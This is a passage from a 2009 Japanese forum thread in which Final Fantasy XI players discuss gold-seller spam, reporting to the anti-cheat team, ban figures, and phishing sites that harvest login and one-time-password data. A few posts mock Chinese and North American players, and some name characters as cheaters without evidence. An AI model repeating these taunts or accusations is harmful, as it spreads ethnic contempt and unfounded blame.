複数のrmt会社だから名前のパターンは違うんだろうけど
314既にその名前は使われています:2009/08/12(水) 14:57:25 ID:IfV0Qrpq
200
315既にその名前は使われています:2009/08/12(水) 15:02:28 ID:zq8R/sR2
>>313
誤認させるためか、使える名前が減ってきたのか、通報し難いったらありゃしないよな。
アドバンテージw使えば楽にはなるが業者通報するために自分が不正者になるのも嫌だシナ。
316既にその名前は使われています:2009/08/12(水) 15:04:26 ID:GhWjTtP3
bろがめ。こm は乱打系ばっかりじゃない?
bろさぇ。こm は鯖名の最初3つ+ピンインが多いけど
317既にその名前は使われています:2009/08/12(水) 15:58:48 ID:IfV0Qrpq
208
318既にその名前は使われています:2009/08/12(水) 16:39:50 ID:xI8CBVoi
予防上げ

319既にその名前は使われています:2009/08/12(水) 17:02:16 ID:UyT46N0T
以前トークンの件で■に送った者です。

電話来てトークンに異常があったので調査してもう一回電話しますとのこと。
おいおい、トークンまで危ないのかよ。
320既にその名前は使われています:2009/08/12(水) 17:03:37 ID:uhsaBO2U
トークン故障ってのはサッチェルスレに何人か居たと思う
使えないだけで危ないっていうわけじゃないかな
321既にその名前は使われています:2009/08/12(水) 17:58:41 ID:z8gWyOsY
プレイヤーの半数が買ってたとしても20万個以上のトークンが出荷されたんだから
不良品が何個か混ざるのは仕方ないだろう。
322既にその名前は使われています:2009/08/12(水) 18:02:33 ID:GhWjTtP3
不良品か〜

何かの話で
100個作ったら不良品が5個できる品物があったとして
不良品が極力出ないように工夫を重ねて100個全部を正常な品物にしようとするのが日本で
100個より少し多く生産して正常な品を100個にするのが米国(だっけ?)って話があったのを思い出した
中国製って書いてあるから、トークンはどれくらいのものなんだか
323既にその名前は使われています:2009/08/12(水) 18:12:14 ID:Z5L/gm+y
セキュリティ関係だから機密保護と品質のチェックは厳しいと思うけどな

何せ国が堂々と機密要求する国だし
ほんの少しでも油断すると冗談じゃなく会社終わる
324既にその名前は使われています:2009/08/12(水) 18:35:10 ID:U5E0WYx7
323ってさ!
325既にその名前は使われています:2009/08/12(水) 18:37:06 ID:hcTAZJuV
MSが8月の月例パッチ9件を公開、ATL使用アプリなどを修正
http://internet.watch.impress.co.jp/docs/news/20090812_308645.html

全PCwindouzuappudeito完了あげ
326既にその名前は使われています:2009/08/12(水) 19:54:13 ID:IfV0Qrpq
もう223とか
レミントンの弾かよ
327既にその名前は使われています:2009/08/12(水) 19:54:52 ID:xjNpYjSN
XPのPCには落ちてきたけどびすたwのほうに更新こねー;;なんでだ;;age
328既にその名前は使われています:2009/08/12(水) 20:28:11 ID:BWUx/zoX
そういえば、前回の緊急Updateの時に
.NET Frameworkの使ってないVerまでご丁寧にインスコした上で
修正パッチあてられて参った。
使ってないんだから入れなくていいじゃん。ドサクサ紛れとはまさにこのこと。
329既にその名前は使われています:2009/08/12(水) 21:20:15 ID:/19FJXQS
      M
     (Θ∋
   ,,,,,;(( ゚Д゚)) <WindowsとNoScriptの更新は済ませたかいカラage
  ,.;゙; (ノ."""';)
  `'ヾ;, ,.  , .;'
     '∪''∪

330既にその名前は使われています:2009/08/12(水) 22:11:18 ID:GXev841y
>>302
栽培が潰れたからGM真似て偽装サイト誘導したり必死になってるんだろう
331既にその名前は使われています:2009/08/12(水) 22:12:50 ID:I/cuK7B7
あんなのにひっかかる奴いるのかね?

いるからすくえにも注意するんかな。あげ。
332既にその名前は使われています:2009/08/12(水) 22:18:45 ID:zq8R/sR2
>>331
ネトゲの世界でソーシャルハッキング的なモノに引っかかる奴とかいるし
スパムも嘘かもしれないが本当なら助かるから利用してみよう、
ッてのが多いから未だにスパムが流行中な訳で・・・

実際GMからテル受けた事がない奴が殆どだろう
よくよく考えたらテル返信で気が付く気もするが
念には念を込めてですね。
333既にその名前は使われています:2009/08/12(水) 23:01:33 ID:YyIzC0LU
子供なら十分引っ掛かってくれるでしょ
334既にその名前は使われています:2009/08/13(木) 00:28:41 ID:T8ccq2gr
age
335既にその名前は使われています:2009/08/13(木) 02:05:18 ID:4teHLL98
242
336既にその名前は使われています:2009/08/13(木) 02:44:06 ID:siSdNuOQ
早めの浮上
337既にその名前は使われています:2009/08/13(木) 05:10:37 ID:k8SHOhwk
>>255
アイテム課金も業者てんこ盛りです
338既にその名前は使われています:2009/08/13(木) 05:25:06 ID:8wuBCSI3
むしろアイテム課金のほうがワラワラいるな
339既にその名前は使われています:2009/08/13(木) 08:12:27 ID:coQgC2WI
っもvg。こm ってのからギル売ってくれtellがきた・・・これ初めて見たかも

Caishenhuo>> www●mmovg●com are re quiring a mass og gil.if you have spare gil,you can sell us.we can help you to change your gil into dollars.

だそうな
コールしておこう
340既にその名前は使われています:2009/08/13(木) 08:14:57 ID:coQgC2WI
いつもの定型文でしたとさ
341既にその名前は使われています:2009/08/13(木) 11:30:23 ID:7YsiU2Ia
ほしゅ
342既にその名前は使われています:2009/08/13(木) 12:00:17 ID:KD7+N0qL
Kujata鯖の東アルテパ砂漠で ドラクエ歩きの三人組発見
装備はレザーとブラススピアで統一されてた
流砂洞に入った所まで確認
アイテムの受け渡しかな?
343既にその名前は使われています:2009/08/13(木) 12:09:40 ID:cOHbEWTS
ブラスアクス+レザーなら俺のジュノ倉庫だ
初期装備は嫌だけど10まで上げるのめんどくさくてさ…
344既にその名前は使われています:2009/08/13(木) 12:10:26 ID:CN2rokGp
>>229
このサイトすごいな。
PlayOnline ID 〜 Square Enix ID 〜 One-Time password まで全て入力させようとしてる
データ受信したタイミングで、即行、別端末からログイン出来るシステムでも完成したのかな
ワンタイムパスでも10秒前後は猶予時間があるから、気をつけないとな
345既にその名前は使われています:2009/08/13(木) 12:13:42 ID:cOHbEWTS
>>344
うへ、前はLSコミュと同じでPOLIDとPOLパスだけだったのに…。
画像差し替えなきゃ orz
346既にその名前は使われています:2009/08/13(木) 12:18:10 ID:CN2rokGp
ID:cOHbEWTS

天 安 門 (笑) 腰 抜 け (笑)
347既にその名前は使われています:2009/08/13(木) 12:32:25 ID:5r9Skl1s
流石戦車で民衆をひき殺して隠蔽になってない隠蔽をする国は格が違った(笑)
348既にその名前は使われています:2009/08/13(木) 12:36:16 ID:ZAMKzrcj
ワンタイムパスは一回しか使えないってだけで、一度表示させたものは
数分間有効だよ
349既にその名前は使われています:2009/08/13(木) 12:40:34 ID:CN2rokGp
道理で、■も注意喚起するわけだ
350既にその名前は使われています:2009/08/13(木) 13:53:04 ID:z5vo9p3Z
>>344
すげぇなおいw
351既にその名前は使われています:2009/08/13(木) 14:20:27 ID:cOHbEWTS
ilion■blog47■fc2■com/blog-entry-147.html
デタラメなアカウント情報を送…
352既にその名前は使われています:2009/08/13(木) 14:36:45 ID:S2mT89xI
7月って不正対処とかされた?

裏の固定メンバーとか7月上旬以来音信普通なやつが何人かいるんだけれど。
353既にその名前は使われています:2009/08/13(木) 14:43:43 ID:8wuBCSI3
>>352
まんどくてバックれ、会社などリアルがやばくて暇がない、一般人は帰省ですし^^etc

好きなの選べ
354既にその名前は使われています:2009/08/13(木) 14:44:32 ID:YkxRRqdK
飽きたか鯖移動したかじゃないのー?
消えたメンバーは不正をしてるような人らだったんかね?
355既にその名前は使われています:2009/08/13(木) 14:45:11 ID:z5vo9p3Z
>>352
流石にそれはユーザーの意思で決別出来たんでない?
レリックとか作ってやる気満々だったんなら

対処したアカウント数と凍結ギル額の履歴
ttp://www.playonline.com/ff11/rule/specialtask.html
2009.08.04(火) 04:00 From: ファイナルファンタジーXI
栽培に関する変更について
ttp://www.playonline.com/ff11/polnews/news16663.shtml

上に示したwebページ参照して空想してくれ。
356既にその名前は使われています:2009/08/13(木) 14:46:45 ID:cOHbEWTS
スペシャルタスクフォースレポートについて (2009/01/29)
ttp://www.playonline.com/pcd/topics/ff11/detail/4093/detail.html
現在ではいただく報告メールはSTF発足当初に比べて激減しました。
多くのプレイヤーの皆さんは、今では規約違反行為者の存在を
意識することなくプレイができているのではないでしょうか。
(略)
今後はスペシャルタスクフォース専用ページ内で
対処したアカウント数と凍結ギル額のみを適宜ご報告します。

対処したアカウント数と凍結ギル額の履歴
ttp://www.playonline.com/ff11/rule/specialtask.html
2009年7月1日〜2009年7月31日 31,630 約27億
2009年6月1日〜2009年6月30日 16,230 約21億
2009年5月1日〜2009年5月31日 12,170 約27億
2009年4月1日〜2009年4月30日 9,500 約23億
2009年3月1日〜2009年3月31日 11,070 約15億
2009年1月28日〜2009年2月28日 7,650 約21億
2008年12月23日〜2009年1月27日 7,210 約15億

増えとるがな…
357既にその名前は使われています:2009/08/13(木) 14:50:21 ID:8wuBCSI3
■シャントット宅前での出来事
いきなり扉の処にアノン素っぱのPCが3体湧く→シャントットのそばによる→なぜか扉の処にまたワープ

→またシャントットの前→なぜか3人が消える→サーチするといきなり水の区にいる→GMコール→キャラがなぜかロランに

→バタリア>氷河>フェイン→森の区>シャントット→「POLより(ry」

リアルで通報するのにPOL行ってどうすんだボケガage
358既にその名前は使われています:2009/08/13(木) 14:51:21 ID:YkxRRqdK
栽培潰した今月以降を見守りたいな
359既にその名前は使われています:2009/08/13(木) 14:54:40 ID:S2mT89xI
>>353-355
ありがと。
定時コンテンツだからいきなりパッタリ音信不通とか困ってるんだよね〜
360既にその名前は使われています:2009/08/13(木) 17:18:23 ID:cOHbEWTS
272
361既にその名前は使われています:2009/08/13(木) 18:47:24 ID:s+Z/Ejj4
なんでもない普通のエリアだとRMTテルこないのに
リヴェにいるとRMTテルがくる不思議あげ
362既にその名前は使われています:2009/08/13(木) 19:18:32 ID:gTf77V0B
>>357
デションIIのクエか・・・。
363既にその名前は使われています:2009/08/13(木) 19:41:56 ID:A0BYHCeK
>>357
墨猫日記に書かれてたワープツールでのスクロール業者だな。
364既にその名前は使われています:2009/08/13(木) 19:46:11 ID:8wuBCSI3
こんなあからさまなワープもGMはう定型文でPOLからだz

リアルタイムで監視する気はないって言うかSTFと全くつながりが無いってことだな
バイトGMじゃ他部署に報告も入れられないとか全く意味ない
365既にその名前は使われています:2009/08/13(木) 20:16:15 ID:z5vo9p3Z
>>364
何度か出てると思うがPoLのSTF連絡フォームも
ゲーム内に作るべきだよな。
366既にその名前は使われています:2009/08/13(木) 20:19:52 ID:A0BYHCeK
GMがSTFに言えという定型文を返し始めたのは確か昨年の10月か11月だったと思うが、
それからもう1年近くになろうというのに、ログアウトせずにSTFに通報できるフォームが
実装されていないというのが、■の口だけ業者対策をあらわしているな。
367既にその名前は使われています:2009/08/13(木) 22:15:07 ID:wbpEndQ/
368既にその名前は使われています:2009/08/13(木) 22:57:38 ID:qtIuu/yv
>>342
でちいと気になった。
いや、楽鯖でも東アルテパでドラクエ歩きしてるの見たのよ。
そのドラクエ歩きガル集団は、東アウトポストで一人残して消えた(装備は覗いてないので外見からだが、全員魚釣り服)
まあ、リーダーらしき一人はイベントのトリート杖だったから、どこかの倉庫だと思ってたんだが…

東アルテパか、その周辺でLV1で集団で稼げる所が存在するんだろうか…
369既にその名前は使われています:2009/08/14(金) 00:10:55 ID:QPKPDhcS
233
しかしドラクエ歩きとは言うもののFF8とかもあの歩き方なんだけどな
8歩きとは言わないな
370既にその名前は使われています:2009/08/14(金) 00:17:34 ID:OAYM4Dw7
>>369
ドラクエ歩きって初期は1の歩き方の事だったはずだが、いつの間にかPT移動になってるな
371既にその名前は使われています:2009/08/14(金) 00:38:52 ID:YUsmjnBC
他ゲーでそんなの再現できねぇし、常識的に考えて先頭キャラにくっついてゾロゾロだろ・・・
372既にその名前は使われています:2009/08/14(金) 00:47:22 ID:Er10Sqv0
ゆとりの誤解こわいな
FC版1の歩き方だろ・・・
373既にその名前は使われています:2009/08/14(金) 00:52:29 ID:YUsmjnBC
キャラの向きかえずに前後左右歩いておけよ。
374既にその名前は使われています:2009/08/14(金) 00:55:44 ID:X5a7v4oq
それなんてウルティマ?
375既にその名前は使われています:2009/08/14(金) 01:12:00 ID:nHVfFMDA
さすがドラクエ1
512KBは伊達じゃないぜ!
376既にその名前は使われています:2009/08/14(金) 01:15:38 ID:nHVfFMDA
FCの容量バイトじゃなくてビットだっけ?
377既にその名前は使われています:2009/08/14(金) 02:58:46 ID:QPKPDhcS
235
378既にその名前は使われています:2009/08/14(金) 03:32:40 ID:JMKYjsIt
今更ながら、Firefoxの先読み機能(network.prefetch-next)にびっくりした。
とりあえずoffにしておいた。。。
379既にその名前は使われています:2009/08/14(金) 05:06:39 ID:2UX2gnYA
業者から売り込みTELがよく入ってくるんだが、これも一応コールしといた方がいいよね?
GM到着する頃にはもう居ないんだが、アカウント辿って潰してくれんかなぁ…
ほんとウゼー
380既にその名前は使われています:2009/08/14(金) 09:11:18 ID:sFIHj5gA
やは
381既にその名前は使われています:2009/08/14(金) 10:09:07 ID:ujV6LW1Z
>>379
それだけはちゃんとGMコールで処理してくれる。
だからGMコールしまくってくだされ。

希にGMが姿現したりテルで情報求めたりウザッたいけれど
『●●●からRMT勧誘テル有り』って内容でコールすれば
定型文が来るだけでそんなにウザッたくない。

でも本当にいい加減GMコールみたいにゲーム内で
不正者通報フォーム作って欲しいよね。
別端末用意するか、一端ログアウトしてPoLから通報とか面倒くさくて
ユーザーが諦めの境地になるの狙ってるとしか思えない。
382既にその名前は使われています:2009/08/14(金) 12:30:18 ID:QPKPDhcS
262
383既にその名前は使われています:2009/08/14(金) 13:51:56 ID:X5a7v4oq
239
384既にその名前は使われています:2009/08/14(金) 14:01:05 ID:zqILP1Kr
>ゲーム内で
>不正者通報フォーム作って欲しいよね。

これ作っても業者が手当たり次第に周辺のPC通報して
通報システム自体が機能しなくなる
他のMMOでは稀に良くある事

俺的には業者からRMで何か買ったPCのBANを最優先して欲しいかな
385既にその名前は使われています:2009/08/14(金) 16:03:19 ID:UAX2d1e3
agemasu
386既にその名前は使われています:2009/08/14(金) 17:05:36 ID:X5a7v4oq
201
スクエニもお盆休みで人少なそうだな…
387既にその名前は使われています:2009/08/14(金) 17:58:34 ID:nHVfFMDA
Kujata鯖ゼオルム火山の業者復活したぽい
2キャラで東西に担当わけて掘ってる
388既にその名前は使われています:2009/08/14(金) 17:59:38 ID:i2mm7Ka6
ケツ鯖も連続広告tell業者が上陸。
午前中にはGMコールしてから同じキャラから5回
(続けてtellし始めたのでコールは2回しました)
午後バザー放置中に上記とは別キャラで26回きてました。
どちらもgoldyeah■com
午後は誰もコールしなかったのかGMが放置したのか
どっちなんだ…。
389既にその名前は使われています:2009/08/14(金) 19:00:59 ID:nHVfFMDA
上げ
390既にその名前は使われています:2009/08/14(金) 19:08:58 ID:OAYM4Dw7
GMには何の権限もないしコールしても無駄だと思う>>364の通りだ

するならまんどくさいがPOLから
てか、客がわざわざ通報してるのに「部署が違いますので^^;」とかってどういう殿様商売だよ
391既にその名前は使われています:2009/08/14(金) 19:43:04 ID:9vepm3N6
Kujata

ゼオルム採掘業者
Botutu,Tollili,

こいつらか。
392既にその名前は使われています:2009/08/14(金) 19:47:52 ID:nHVfFMDA
そいつら
ワープなどツールは使っないと思う
393既にその名前は使われています:2009/08/14(金) 20:23:36 ID:ujV6LW1Z
>>392
単なる誤字だろうが書く事がないので日本語でok
394既にその名前は使われています:2009/08/14(金) 20:28:48 ID:XpCZus4j
625 名前:名も無き求道者[] 投稿日:2009/08/13(木) 17:39:45 ID:8Z9aRQ0U
3年ぶりに復帰しようかと思っている者なのですが、
アカウントが消えてしまっていて見当たりません。
ちゃんとアップグレードした課金アカウントで、酔ったなどの不可抗力の
可能性も含めて、絶対に自分では消していないのですが、
この3年の間に、課金アカウントが消えてしまうような事故はありましたか?

626 名前:名も無き求道者[sage] 投稿日:2009/08/13(木) 17:53:21 ID:cDiL1qUr
GAMECITYのメンバーログオンした時のアカウント一覧に、
ttp://www.gamecity.ne.jp/servlet/NGListAccounts
過去に作ったはずのゲームアカウントがリストされていないと言うこと?
これは、聞いたことない。要問い合わせなんだけど、いま肥休み中だからな
適当に体験垢つくってGMに状況を相談してみるといいかも知れない

627 名前:名も無き求道者[sage] 投稿日:2009/08/13(木) 18:34:48 ID:nstS3yPr
3年も放置してるとさすがに消されるんじゃないかな
色々勝手が変わってるだろうし1からやり直してみたら?


アカハックですかね?
395既にその名前は使われています:2009/08/14(金) 20:30:16 ID:QPKPDhcS
よそのゲームのアカウントの保持期間は知らんぞな
396既にその名前は使われています:2009/08/14(金) 22:31:09 ID:nHVfFMDA
265
保守 ついでにヌルポ
397既にその名前は使われています:2009/08/14(金) 23:26:45 ID:QPKPDhcS
>>396
398既にその名前は使われています:2009/08/15(土) 00:54:25 ID:wK/SCnhj
漏れはノートン、バスター、NOD32、Bitdefender、AVAST!、AVG、KINGSOFT、AntiVir
常駐最強(´・ω・)ス

最初にバスターを入れれば複数いける(´・ω・)ス
普段は不具合ないけどウィルス発見した時すごいことになる(´・ω・)ス
ソフト同士で取り合いを起こす(´・ω・)ス
ノートン「とったどー!隔離する(´・ω・)ス!」
バスター「(ノートンの隔離フォルダから)とったどー!隔離する(´・ω・)ス!」
NOD32「(バスターの隔離フォルダから)また見つけたどー!」
Bitdefender「(NOD32の隔離フォルダから)不審ファイル発見致しました」
AVAST!「(Bitdefenderの隔離フォルダから)おいどんもまたみつけたでごわ(´・ω・)ス!」
AVG「(AVAST!の隔離フォルダから)わいがまたまたみつけたで」
KINGSOFT「(AVGの隔離フォルダから)朕がみつけたでごじゃる」
AntiVir「(KINGSOFTの隔離フォルダから)我再見」
ノートン「(AntiVirの隔離フォルダから)またとったどー!隔離する(´・ω・)ス!」

って繰り返す(´・ω・)ス
テラバカ(´・ω・)ス

あとむちゃくちゃ重くなるから常用は無理(´・ω・)ス
399既にその名前は使われています:2009/08/15(土) 01:32:32 ID:P8gOclSf
酢っスとかいっちゃうタイプ?ちょーうける〜
400既にその名前は使われています:2009/08/15(土) 01:39:14 ID:dESgZ4vp
>>399
新参乙
401既にその名前は使われています:2009/08/15(土) 02:28:15 ID:at/CyyGU
上にいきます
402既にその名前は使われています:2009/08/15(土) 02:47:56 ID:wy29Qgt1
blogameうぜー
403既にその名前は使われています:2009/08/15(土) 04:17:21 ID:I9NGT9ng
>>394
引用するなら引用元のスレがわかるような情報(板名スレタイURL etc.)もあわせて書いとくれ
いきなり数レスだけ引っこ抜いた上にどのネトゲで起きたことかもわからんような物、
「アカハックですかね?」って聞かれたところで何とも答えようが無い
404既にその名前は使われています:2009/08/15(土) 09:35:35 ID:HNFkQRap
garudaもゼオルムの業者沸いたっぽいなぁ
まだFFXIAH晒すのは早いかもしれんからしないけど

昨日の宣伝テル短くてワロタ
ttp://tune.ache-bang.com/~vg/outitem/up/img/23679.jpg
405既にその名前は使われています:2009/08/15(土) 11:57:19 ID:wK/SCnhj
      M
     (Θ∋
   ,,,,,;(( ゚Д゚)) <263age
  ,.;゙; (ノ."""';)
  `'ヾ;, ,.  , .;'
     '∪''∪

406既にその名前は使われています:2009/08/15(土) 12:52:51 ID:at/CyyGU
age
407既にその名前は使われています:2009/08/15(土) 13:37:58 ID:HJ78vYXm
Kujata サンド港

Fdsgbdhfgxjgnxg

いつもやつ、って書いて送ったらRMT宣伝tellで調べるって返信来た。
わかってるならいわれる前に対処しろよw
408既にその名前は使われています:2009/08/15(土) 13:38:45 ID:HJ78vYXm
いつものやつ、だった
409既にその名前は使われています:2009/08/15(土) 14:57:46 ID:gWW8Zq58
深夜組なんで昼間の状況が分からないんだが、RMTtellって24時間くるもん?
最近25時くらいから、RMTtellが1時間に3〜5回くるんだわ。
PS2だとtellの赤文字が3行ぎっしりで、狩りのすげえーーーーーーーー邪魔。
宣伝と言うより嫌がらせだよ、まったく。
410既にその名前は使われています:2009/08/15(土) 15:39:02 ID:wy29Qgt1
日本時間の深夜0時すぎから昼くらいまで活発なんじゃね?
411既にその名前は使われています:2009/08/15(土) 15:46:35 ID:aL9YGsdq
ギルの主な購入者であるNAの活動時間帯を狙っているんだろうね。
412既にその名前は使われています:2009/08/15(土) 17:00:42 ID:3sCNkKie
日本人の場合は反発してGMコールしまくるイメージでもあるのかね?
以前は定型文崩したり(?)して変な日本語使ってたよね。

クライアントソフト自体は垢ban喰らっても問題無く使えるはずなのに。
413既にその名前は使われています:2009/08/15(土) 17:49:06 ID:LDjrmE14
フレの倉庫(レベル5)と自分のキャラ名の頭文字が同じでかなり後ろのほう。
夜中一緒にインして全然別々の場所にいても数秒差で業者テルがくる。
どんなテル送信BOT使ってるんだろうなあ。
414既にその名前は使われています:2009/08/15(土) 19:21:02 ID:ijEBy12J
地図サイト「ffxi-atlas」は誰かがGoogleに通報したようだね。
アクセスしようとしたらブロックされたわ。
バナー無しで運営すれば良いのに。
415既にその名前は使われています:2009/08/15(土) 19:32:40 ID:aL9YGsdq
sdo.acのフィッシングサイトがさらにバージョンアップしてるな…。

>>414
いやードメインやレン鯖もタダじゃねーし。
416既にその名前は使われています:2009/08/15(土) 20:18:59 ID:3sCNkKie
ネトゲ運営側がユーザーに会員サービスの
一環として場所提供してくれればいいのにな。

まぁ、基本的に攻略情報とか商売の邪魔でしかないから無理だろうけれど。
417既にその名前は使われています:2009/08/15(土) 21:14:31 ID:1c3kFZxc
あげとくにゃー
418既にその名前は使われています:2009/08/15(土) 23:16:58 ID:QRkf87qr
にゃーも
419既にその名前は使われています:2009/08/16(日) 00:58:22 ID:IuBDI9tY
256にゃー
株スレ落ちて哀しい
420既にその名前は使われています:2009/08/16(日) 04:26:43 ID:p5JkgQY0
      M
     (Θ∋
   ,,,,,;(( ゚Д゚)) <267age
  ,.;゙; (ノ."""';)
  `'ヾ;, ,.  , .;'
     '∪''∪
421既にその名前は使われています:2009/08/16(日) 07:49:10 ID:EcJtXbe9
昨日、砂漠でツーラーらしきツーラーに会った。
チョコボに乗って穴掘りなんだが、動きが超極端。
だって、渦を巻くような動きって端からみて解ったもんwwwww

それをGMに報告したが、8県待ちなのに、お決まりの定型文で返事。給料泥棒だと解ったwwwww
422既にその名前は使われています:2009/08/16(日) 09:11:14 ID:BScjSYpz
ラバオの前でぐるぐる回っている首?
423既にその名前は使われています:2009/08/16(日) 10:08:42 ID:bVavwXRk
>>398
和んだ^^
424既にその名前は使われています:2009/08/16(日) 10:30:46 ID:EcJtXbe9
>>422
ううん。最初大きく円を描いて、俺のLV上げの邪魔したからしっかり覚えてるんだ。

ツーラーを暇つぶし&怨みはらしに通報するにはいい穴場だよ。
425既にその名前は使われています:2009/08/16(日) 13:33:33 ID:btJZ3Jkk
281
426既にその名前は使われています:2009/08/16(日) 13:59:30 ID:t4rFf/td
RMTのtellしてくるキャラクターを数日STFに報告してたけど、
さすがにきりがないので、GMにこれどうすんだと聞いてみた。
具体的な対策を現在講じている最中です云々という回答。

いつまでにそれができるのかと聞けば、
自分には解らないので、返事のもらえる別のメールフォームで聞いてくれと。

RMTtell対策をいつまでにするという質問に対しての応答が、
個人に対してできないのであれば、
公式にアナウンスしてくれという依頼のメールして、
帰ってきたのは定型文。自動配信かもしれないけど。

今までサチコメでRMTtellしたらSTFに通報すると英語で書いて自衛してたけど、
数日待って何も起きないのであれば、自分は解約するは。
427既にその名前は使われています:2009/08/16(日) 14:03:46 ID:cf557ZQw
いますぐかいやくすればいいとおもうよ
428既にその名前は使われています:2009/08/16(日) 14:27:07 ID:lKbOEGye
解約云々は好きにすればいいと思うが
夏期休暇中になにかを報告して夏期休暇中に対処できる会社なんてほぼない。
人命の関わる災害クラスでも数日から数週間かかるのに
ゲームのRMT対策wをそれと同等以上に対応しろというのは
どうかと思われるから良く考えてしゃべったほうがいい。
429既にその名前は使われています:2009/08/16(日) 14:32:16 ID:+YZTxAFG
>>412
噂でしかないけど
NAの9割が使っていると言われてるような窓化その他もろもろのGUI改変ツールの中には
フィルタ機能があって、鬱陶しいと思うNAはそもそも聞こえていない=通報しない
でも、主要な購入者の多くがNAだから、その時間帯を狙うんじゃないかな

自分が楽しめればルールなんてどうでもいい、BOTもRMTも楽しむための手段
むしろ楽しめない仕様が悪い、だから便利に遊べるツールを使うのは悪くない
とか開き直ってる国だろ、NAって
430既にその名前は使われています:2009/08/16(日) 14:32:48 ID:aODYVCei
災害対策とRMT対策はかかる費用や工数がぜんぜん違うけどねw
431既にその名前は使われています:2009/08/16(日) 14:43:37 ID:GYsNPVw/
432既にその名前は使われています:2009/08/16(日) 16:00:50 ID:t4rFf/td
少し頭冷えた。

確かに>>428の言うこともわかるけど、
tellくるようになってから、もうだいぶ経過してるし、
これまでのRMT関連のスクエニの対応も、全部後手後手。
RMT業者に潰された他のネトゲのように、
何もしないよりはましだとは、確かに思う。

でも、大半は14とかの開発に人員さいちゃってて、
11関連の運営維持スタッフも、今では慢性的な人手不足なんだろうと考える。

自分の鯖では、RMTtellのキャラを、このお盆時でも報告から少なくとも15分以内には
キャラがサーチから消えるから、彼らがそれなりに頑張ってるのも解る。

でも、結果的に、スクエニと業者の事務処理スキル上げをさせてるだけのような気がして
なんだかムナシイ。

要は戦闘中で、蝉を数えてる時にこのtellくるとイライラする!wってのが、
自分の行動の発端。
...離籍マーク出して戦闘するか。
433既にその名前は使われています:2009/08/16(日) 16:46:22 ID:vkuQV2jd
チャットシステムは悪名高きランダム藤戸が生みの親っていう時点で察してくださいw
434既にその名前は使われています:2009/08/16(日) 16:56:41 ID:t4rFf/td
【わかりました】【残念です】
435既にその名前は使われています:2009/08/16(日) 17:11:58 ID:BMEgX+RT
>>398
マジレスすると同時にインストールできない。
436既にその名前は使われています:2009/08/16(日) 19:06:32 ID:0m9AalNJ
>>435
マジレスすると1年前からあるコピペ
437既にその名前は使われています:2009/08/16(日) 19:14:04 ID:/r7Zc4Md
>>436
マジレスすると2006年からある
438既にその名前は使われています:2009/08/16(日) 19:21:07 ID:jRjNphgA
酢っスとかいっちゃうタイプ?ちょーうける〜
439既にその名前は使われています:2009/08/16(日) 20:57:52 ID:PRJX/ZqG
帰省終了age
440既にその名前は使われています:2009/08/16(日) 22:26:09 ID:Hx1clC2+
ソニー公式の発表によればオンの課金収益が期待できるPS3のアクティブなオンユーザーて30万しかおらん。9割はオンに興味がないオフ専。そのうちの2%が14やったとして6,000人。
つーか大本営発表だから実際はもっと少ない30万てかなり水増ししとる。PS2みたいに国内1000万超えの圧倒的な普及台数ならコンシューマーだけでもやっていけたろうが。

そもそもスクエニ自身がPS3のオンコンテンツの収益だけじゃやっていけないとわかってるからはじめからPCでもやるとアナウンスしとるわけだ。

441既にその名前は使われています:2009/08/16(日) 23:39:38 ID:yNuhcNhI
KY
442既にその名前は使われています:2009/08/16(日) 23:40:56 ID:vhWLxBbk
>>441
..........
443既にその名前は使われています:2009/08/16(日) 23:41:37 ID:SBxGEwDm
>>441
朝日新聞ですね。
444既にその名前は使われています:2009/08/17(月) 00:28:33 ID:rGpQSwSQ
嫉みでしかないが、孔雀経の護符持った外人見るとツーラーとしか思えない
445既にその名前は使われています:2009/08/17(月) 00:30:14 ID:v6NZ7VD/
俺のクジャクは天然ものだぜ。
あとナイズルの鑑定で一回だけ孔雀経を見た。
446既にその名前は使われています:2009/08/17(月) 00:53:58 ID:BnHWjPaF
Kujata ゼオルム採掘業者

Botutu,Tollili

今日も活動中。PT組んで偽装したり、ビシージでワープ用の戦績を稼いだり、
相変わらずやってる事が同じ。それなのに放置されている謎。
447既にその名前は使われています:2009/08/17(月) 01:03:45 ID:aa7z4dIr
猫鯖
中華?業者?がレベル上げ開始してる。現在50代(ランク4)で3垢で一般装ってる。クロ巣の謎装置にいくと途中で良く見かける。一般を3人巻き込んでやってるようだ。
448既にその名前は使われています:2009/08/17(月) 01:49:18 ID:qD9kR/xi
>>440
ソニーの発表は主にHomeのアイテム課金に関してでしょ。
FF14をやるユーザー層とは違うわな。

スクエニがWindowsにこだわるのは、海外でのことを考えての話。
ヨーロッパではPS2でさえ普及してなくて「PS2?それ何?」って時代に
FF11はサービス開始された。

PS3は、欧米でそれなりに知名度もあるし台数も出てるから、
今ならPS3版だけでもいけると判断できると思うけど、
FF14の開発自体はPS3発売前から開始されてるから、
その当時にFF11のときの経験から、
「海外(欧米)でやるならWindowsはmust」って
田中Pが判断しちゃってスタートしてるんだから仕方がない。

449既にその名前は使われています:2009/08/17(月) 05:12:03 ID:GmxJaeqi
age
450既にその名前は使われています:2009/08/17(月) 06:29:58 ID:y/FS7oQ0
>>446
発生の時期を考えると、機を見た一般人の金策ということはありませんか?
現地調査したうえでの晒しなのかな?
少なくとも晒されてるうちの1名は一般人の可能性が高いような気がするんですよね
その人の別キャラ(名前が似てるという理由だけですが)は私と同じ金策をやってたと思います
その金策は業者が手を出すとは思えない金策です

これとは別件ですが、私はとあるアイテムの競売履歴で晒されたことがあって
ジュノ倉庫キャラを消したという経緯があります
FFAHで調べれば入手経路が容易に白と判明するものでした

やましいことがなければ消す必要がないだろういうのは晒した側の意見です
晒されたという事実だけが伝播していきます

明確な根拠の提示のない晒しは妬みの可能性があるということも忘れないでいただきたい
451既にその名前は使われています:2009/08/17(月) 06:47:35 ID:Gg65LjOb
基本、あまりにもあからさまなもの(裸で連なって歩く、名前酷似・フェイス同じ集団)以外の晒しは、勘違いというか、思い込みだって。
そんなの分かってるから、気にしなくていいもんだ。
対処を見るに、450自身も思い込みが激しいタイプだろうけどねー。
452既にその名前は使われています:2009/08/17(月) 07:09:41 ID:nM6rWGDU
ぶんろセールさん買っても100%セーフだそうだ


100%って久しぶりにミタヨ
453既にその名前は使われています:2009/08/17(月) 07:12:16 ID:nvtic9WY
たとえば、オープンにしている倉庫キャラが晒されたとしましょう
フレなら弁解せずとも解ってもらえるでしょう
だがしかし、目的別LS等ではどうでしょう
面子毎にいちいち弁解してらんないし
ネタに飢えた烏合の衆相手に自垢の構成を披露してみても泥沼でしょう
454既にその名前は使われています:2009/08/17(月) 07:41:46 ID:Gg65LjOb
目的別ってだけの間柄に、何でいちいち弁解?
455既にその名前は使われています:2009/08/17(月) 07:58:58 ID:Qc5jk5/V
